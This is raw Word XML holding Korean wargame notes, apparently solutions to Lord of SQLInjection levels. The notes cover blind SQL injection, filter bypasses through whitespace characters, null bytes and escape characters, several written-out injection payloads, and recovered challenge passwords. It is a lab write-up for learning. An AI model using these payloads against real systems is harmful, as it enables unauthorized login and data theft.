      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">시켜버리므로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">blind Sql inejction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>필요</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서 쿼리문에 싱글쿼터는 사용할 수 없는데 보니까 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>부분에는 싱글쿼터가 필요로 하지 않음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이부분에 or과 등호 대신 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 써서 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">부분을 전부 참 값으로 만들어 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 로그인을 성공하도록 만들 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00B72B1A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">length(pw) like 8 -&gt; Hello admin 나옴 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">admin 계정의 패스워드 자리수는 </w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자리</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00E96A47">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>no 뒤에 파라미터값 삽입해서 패스워드 알아냄</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96A47" w:rsidRDefault="00E96A47"/>
    <w:p w:rsidR="00E96A47" w:rsidRDefault="00E96A47">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">패스워드 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96A47">
        <w:t>1c62ba6f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C91613" w:rsidRDefault="00C91613"/>
    <w:p w:rsidR="00E96A47" w:rsidRDefault="00E96A47"/>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="00E96A47">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bugbear </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96A47" w:rsidRDefault="00E96A47">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>싱글쿼터,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">like 필터링, addslashes 사용해 싱글쿼터를 일반문자로 사용하도록 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">escape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">시켜버리므로 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">blind Sql injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용해야함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C0054" w:rsidRDefault="006C0054">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공백 필터링</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96A47" w:rsidRPr="00E96A47" w:rsidRDefault="00E96A47">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>like bypass = in()으로 사용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRDefault="006C0054">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">답 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0054">
        <w:t>735C2773</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B72B1A" w:rsidRPr="00B72B1A" w:rsidRDefault="00B72B1A"/>
    <w:p w:rsidR="00F93C9D" w:rsidRPr="00F93C9D" w:rsidRDefault="00F93C9D"/>
    <w:p w:rsidR="009B7DAF" w:rsidRDefault="009B7DAF"/>
    <w:p w:rsidR="00FA1B2F" w:rsidRDefault="00FA1B2F"/>
    <w:p w:rsidR="00574962" w:rsidRDefault="00574962"/>
    <w:p w:rsidR="00574962" w:rsidRDefault="00574962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>giant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00574962" w:rsidRDefault="00574962"/>
    <w:p w:rsidR="00574962" w:rsidRDefault="00574962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from 과 테이븖명 사이에 공백문자를 삽입해야 값을 가져올 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F5FEC" w:rsidRDefault="001F5FEC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>엔터,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>탭,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r(커서를 처음으로 올기는 문자)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>필터링, 공백 필터링</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F5FEC" w:rsidRDefault="001F5FEC"/>
    <w:p w:rsidR="009D127F" w:rsidRDefault="009D127F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공백문자 삽입하여 해결</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00574962" w:rsidRDefault="00574962">
      <w:r>
        <w:t>%0b</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vertical tab, 수직탭)</w:t>
      </w:r>
      <w:r>
        <w:t>, %0c</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>프린터 용지 먹임,</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>새 페이지)</w:t>
      </w:r>
      <w:r w:rsidR="001F5FEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F5FEC" w:rsidRDefault="001F5FEC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%09</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>탭)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0d</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>줄바꿈,엕터)</w:t>
      </w:r>
      <w:r>
        <w:t>,0a</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009D127F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>줄바꿈)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA1B2F" w:rsidRDefault="00FA1B2F"/>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B"/>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B"/>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B"/>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>assassin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B"/>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>싱글쿼터 필터링</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아예 패스워드를 문자열로만 받도록 필터링이 되고 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">문제 해결 조건이 무조건 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 로그인이 되어야함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>즉,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 패스워드를 알아내야댐.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B"/>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서 sql 문자 검색 방법으로 유추가 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E7594" w:rsidRDefault="000E7594">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>% : 특정 문자열이 포함된 문자를 조회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047163B" w:rsidRDefault="0047163B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ex) </w:t>
      </w:r>
      <w:r w:rsidR="000E7594">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="000E7594">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a%</w:t>
      </w:r>
      <w:r w:rsidR="000E7594">
        <w:t xml:space="preserve">” : </w:t>
      </w:r>
      <w:r w:rsidR="000E7594">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a로 시작하는걸 모두 조회</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F24F7" w:rsidRDefault="001F24F7"/>
    <w:p w:rsidR="001F24F7" w:rsidRDefault="001F24F7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자동화 코드 작성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F24F7" w:rsidRDefault="001F24F7"/>
    <w:p w:rsidR="001F24F7" w:rsidRDefault="001F24F7"/>
    <w:p w:rsidR="001F24F7" w:rsidRDefault="001F24F7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서 자동화 코드 작성을 했는데 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">꺼만 나오고 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>꺼가 안나오는 경우:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F24F7" w:rsidRDefault="001F24F7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그것 해당 자리의 문자가 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이랑 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">랑 같은 확률일 수가 있어서 DB상에서 순서가 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 먼저일 경우 이런 경우가 가능함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F24F7" w:rsidRDefault="001F24F7"/>
    <w:p w:rsidR="001F24F7" w:rsidRDefault="00FF0D57">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">guest 계정이 먼저인지 테스트로 </w:t>
      </w:r>
      <w:r>
        <w:t>pw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 문자열에 </w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 넣어봣는데 </w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">출력 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ==&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> guest가 DB상의 순서가 먼저임</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A199D" w:rsidRDefault="005A199D"/>
    <w:p w:rsidR="005A199D" w:rsidRDefault="005A199D"/>
    <w:p w:rsidR="005A199D" w:rsidRDefault="005A199D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자동화 코드 짜고 설명</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554"/>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554"/>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554"/>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zombie_assassin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ereg 함수 통하여 싱글쿼터를 필터링 하고 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554"/>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ereg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수는 %00(NULL</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문자까지만 패턴을 검색하는 특성이 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554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패스워드 입력 부분 앞에 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">NULL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문자 삽입하면 됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6554" w:rsidRDefault="002C6554">
      <w:r>
        <w:t>id=admin&amp;&amp;pw=%001’ or 1=1 – ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6554" w:rsidRDefault="009E3991">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB27A5" w:rsidRDefault="00FB27A5"/>
    <w:p w:rsidR="00FB27A5" w:rsidRDefault="00FB27A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">succubus </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB27A5" w:rsidRDefault="00FB27A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">id와 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>부분에서 싱글쿼터를 필터링</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB27A5" w:rsidRDefault="00435C36">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>여기서는 이스케이프 문자를 사용하여 쿼리문의 싱글쿼터에 오류를 내야함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00435C36" w:rsidRDefault="00435C36">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00435C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">where id = </w:t>
      </w:r>
      <w:r w:rsidRPr="00435C36">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00435C36">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>\‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and pw =</w:t>
      </w:r>
      <w:r w:rsidRPr="00435C36">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>or 1=1 --+</w:t>
      </w:r>
      <w:r w:rsidRPr="00435C36">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00435C36" w:rsidRDefault="00435C36">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00435C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>위와 같이 하면 빨간 부분이 문자 처리 되고 뒤에 코드 삽입이 가능해짐</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF09A5" w:rsidRDefault="00EF09A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF09A5" w:rsidRDefault="00EF09A5">
      <w:r w:rsidRPr="00EF09A5">
        <w:t>nightmare</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF09A5" w:rsidRDefault="00EF09A5"/>
    <w:p w:rsidR="00EF09A5" w:rsidRPr="00EF09A5" w:rsidRDefault="00EF09A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">주석문자 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(#,--) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>필터링</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF09A5" w:rsidRDefault="00EF09A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">패스워드의 길이가 </w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자리를 넘으면 안됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF09A5" w:rsidRDefault="00EF09A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿼리문 끝애 id!=</w:t>
      </w:r>
      <w:r>
        <w:t>’admin’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 이라는 것이 박혀있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835"/>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서는 </w:t>
      </w:r>
      <w:r>
        <w:t>‘)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용하여 괄호를 닫아주어야 하고 필터링 되는 주석을 피해서</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>다른 형식의 주소를 넣어주어야 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그래서 답은 다음과 같음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835">
      <w:r>
        <w:t>‘)&lt;1;%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>풀이과정은 다음과 같음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835">
      <w:r>
        <w:t xml:space="preserve">‘) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>두글자 차지</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835">
      <w:r>
        <w:t xml:space="preserve">;%00 -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL 상에서 주석문자이며 해당 문자를 사용할때 </w:t>
      </w:r>
      <w:r w:rsidR="00DC2EFC">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>요거 한자리 차지, 널문자는 자리를 차지하지 않음</w:t>
      </w:r>
      <w:r w:rsidR="00DC2EFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, 그리고 이거 들어간 뒷자리 모두 한줄 주석 처리됨, 이것을 이용하여 뒤 </w:t>
      </w:r>
      <w:r w:rsidR="00DC2EFC">
        <w:t xml:space="preserve">id!=’admin’ </w:t>
      </w:r>
      <w:r w:rsidR="00DC2EFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 무효화 시켜야됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2EFC" w:rsidRDefault="00DC2EFC"/>
    <w:p w:rsidR="00361835" w:rsidRDefault="00361835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넣을 수 있는 자리는 두</w:t>
      </w:r>
      <w:r w:rsidR="00DC2EFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자리이며, 여기다 조건을 참으로 만들기 위한 조건문을 만들어야됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC2EFC" w:rsidRDefault="00DC2EFC"/>
    <w:p w:rsidR="00DC2EFC" w:rsidRPr="00DC2EFC" w:rsidRDefault="00DC2EFC">
      <w:r>
        <w:t xml:space="preserve">(‘’) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">아무 것도 없는 것은 </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>과 같은 , 즉 1보다는 작은 수 이며 &lt;1 을 넣어주면 조건식이 참으로 성립</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF09A5" w:rsidRDefault="00EF09A5"/>
    <w:p w:rsidR="00DA49B5" w:rsidRDefault="00DA49B5"/>
    <w:p w:rsidR="00DA49B5" w:rsidRDefault="00DA49B5"/>
    <w:p w:rsidR="00DA49B5" w:rsidRDefault="00DA49B5"/>
    <w:p w:rsidR="00DA49B5" w:rsidRDefault="00DA49B5"/>
    <w:p w:rsidR="00DA49B5" w:rsidRDefault="00DA49B5"/>
    <w:p w:rsidR="00DA49B5" w:rsidRDefault="00DA49B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xavis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA49B5" w:rsidRDefault="00DA49B5"/>
    <w:p w:rsidR="00DA49B5" w:rsidRDefault="00DA49B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
